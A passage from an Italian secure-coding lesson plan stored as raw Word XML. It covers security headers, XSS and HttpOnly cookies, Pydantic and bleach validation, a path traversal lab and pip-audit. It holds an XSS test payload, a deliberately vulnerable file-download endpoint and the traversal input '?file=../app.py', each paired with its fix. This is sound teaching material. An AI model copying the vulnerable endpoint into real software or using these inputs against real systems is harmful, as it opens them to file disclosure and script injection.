        <w:t xml:space="preserve">Demo securityheaders.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mostra in proiezione l’output di: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https://github.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(voto A)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https://www.python.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(voto B/A)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Un sito italiano scadente (es. un piccolo comune — molti hanno F)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discussione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Perché questa differenza?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="55" w:name="materiali-per-il-docente-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il docente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">04_slide/M3_slide_http.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sezioni header sicurezza + cookie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">04_slide/M6_slide_appweb.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sezione XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">securityheaders.com aperto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lavagna per disegnare il furto cookie via XSS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="56" w:name="verifica-in-itinere-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica in-itinere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Domanda:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Quale header HTTP forza HTTPS dopo la prima visita?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ HSTS.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Verifica pratica: tutti aggiungono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION_COOKIE_HTTPONLY=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al loro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="compito-per-l6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compito per L6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sezione 2 della Checklist (Input validation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test su sito di propria scelta con securityheaders.com — annotare voto e mancanze</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="errori-da-evitare-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Spiegare XSS senza farla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">vedere nel browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’alert popup è il momento didattico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ CSP in dettaglio (è complessa): basta sapere che esiste e a cosa serve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Cookie senza il furto via XSS: il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“perché HttpOnly”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si capisce solo dopo aver visto la minaccia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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L6 — Input validation + Supply chain (2h)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="obiettivi-formativi-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distingue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">validation, sanitization, encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pydantic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per validation strutturata in Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bleach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per sanitizzare HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“ricco”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comprende</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">path traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e sa correggerlo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa eseguire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per scoprire CVE in dipendenze</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="articolazione-minuto-per-minuto-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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053"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2933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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:10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Validation vs Sanitization vs Encoding</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(10 min): cosa fa cosa, quando si usa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + lavagna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:10 – 0:25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Whitelist &gt; Blacklist</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: perché. Esempi di bypass di blacklist (encoding, varianti)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + slide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:25 – 0:50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Lab Pydantic</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: scriviamo un form di registrazione con UserCreate (username, email, password, birthdate, bio). Tutti scrivono il proprio modello con validators custom. Test casi limite (minorenne, email malformata, ecc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:50 – 1:05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Lab bleach</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: sanitizziamo HTML per i commenti. Demo:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">rimosso,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;a href="javascript:..."&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">neutralizzato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:05 – 1:20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PAUSA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1:20 – 1:40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Lab Path Traversal</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: endpoint</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/download?file=...</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">f"./uploads/{filename}"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Tutti provano</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?file=../app.py</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Correzione con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">os.path.realpath</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">startswith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:40 – 1:55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Supply chain — pip-audit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: installazione, run su un</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requirements.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">flask==2.0.0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Trova CVE. Aggiornamento. Discussione: Dependabot, SBOM (CRA dal 2027)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:55 – 2:00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Cross-lang validation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Bean Validation in Java (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@Email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@Min</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">), Zod in TypeScript. Stessa idea, sintassi diversa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:id="61" w:name="Xd497ee27eadb7726ad9b932b633b55bbe6d14ed"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio Pydantic completo (mostra in slide)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pydantic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BaseModel, EmailStr, Field, field_validator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datetime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date</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/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UserCreate(BaseModel):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    username: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Field(min_length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 max_length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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">r"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[a-zA-Z0-9_]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Verbatim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email: EmailStr</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    password: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Field(min_length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12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birthdate: date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@field_validator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"birthdate"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@classmethod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adult(cls, v):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(date.today()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v).days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18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365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raise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ValueError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"devi essere maggiorenne"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v</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="62" w:name="materiali-per-il-docente-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il docente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">M_EXTRA_input_validation_lab.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del repo 32h come riferimento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Requirements.txt con flask 2.0.0 pre-fatto (per dimostrare pip-audit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide cross-lang per Bean Validation/Zod</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="63" w:name="verifica-in-itinere-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica in-itinere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni discente esegue il proprio Pydantic model con almeno 3 casi limite e li vede bloccati. Test rapido: chi ha implementato correttamente la validazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“almeno 18 anni”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="compito-per-l7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compito per L7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sezione 7 della Checklist (Gestione segreti)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Letture:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Guida AI completa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">03_guida_validazione_codice_IA.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="errori-da-evitare-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Saltare la distinzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“validation/sanitization/encoding”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è la radice di molti errori</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Pydantic senza casi limite: serve far</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">fallire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la validation per capire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ pip-audit senza una vulnerabilità reale da trovare: vedere il CVE è il momento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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L7 — Documentazione di sicurezza + Uso responsabile dell’AI (2h)</w:t>
      </w:r>
    </w:p>
